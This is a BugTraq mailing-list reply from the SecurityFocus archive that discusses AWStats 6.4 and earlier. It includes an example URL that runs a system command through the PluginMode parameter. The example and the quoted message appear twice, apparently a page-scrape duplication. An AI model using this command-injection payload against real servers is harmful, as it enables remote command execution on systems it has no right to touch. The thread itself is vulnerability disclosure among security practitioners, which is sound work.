BugTraq
Back to list
Name:
Email:
*Note: Email address will appear as "user domain ext" to prevent harvesting.
Subject:
Message:
Re: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3?
Feb 15 2005 09:00PM
twebster daksoft com
You may need to specify an awstats config to view
example:
http://www.site.org/awstats/cgi-bin/awstats.pl?config=websitename&Plugin
Mode=:print+system('id')+
;
Tony
Jamie Pratt <jpratt (at) norwich (dot) edu [email concealed]> wrote on 02/15/2005 12:25:43 PM:
> So what are the conditions of this bug/vuln? I can't reproduc...
[ more ]
Privacy Statement
Copyright 2010, SecurityFocus
example:
http://www.site.org/awstats/cgi-bin/awstats.pl?config=websitename&Plugin
Mode=:print+system('id')+
;
Tony
Jamie Pratt <jpratt (at) norwich (dot) edu [email concealed]> wrote on 02/15/2005 12:25:43 PM:
> So what are the conditions of this bug/vuln? I can't reproduc...
[ more ]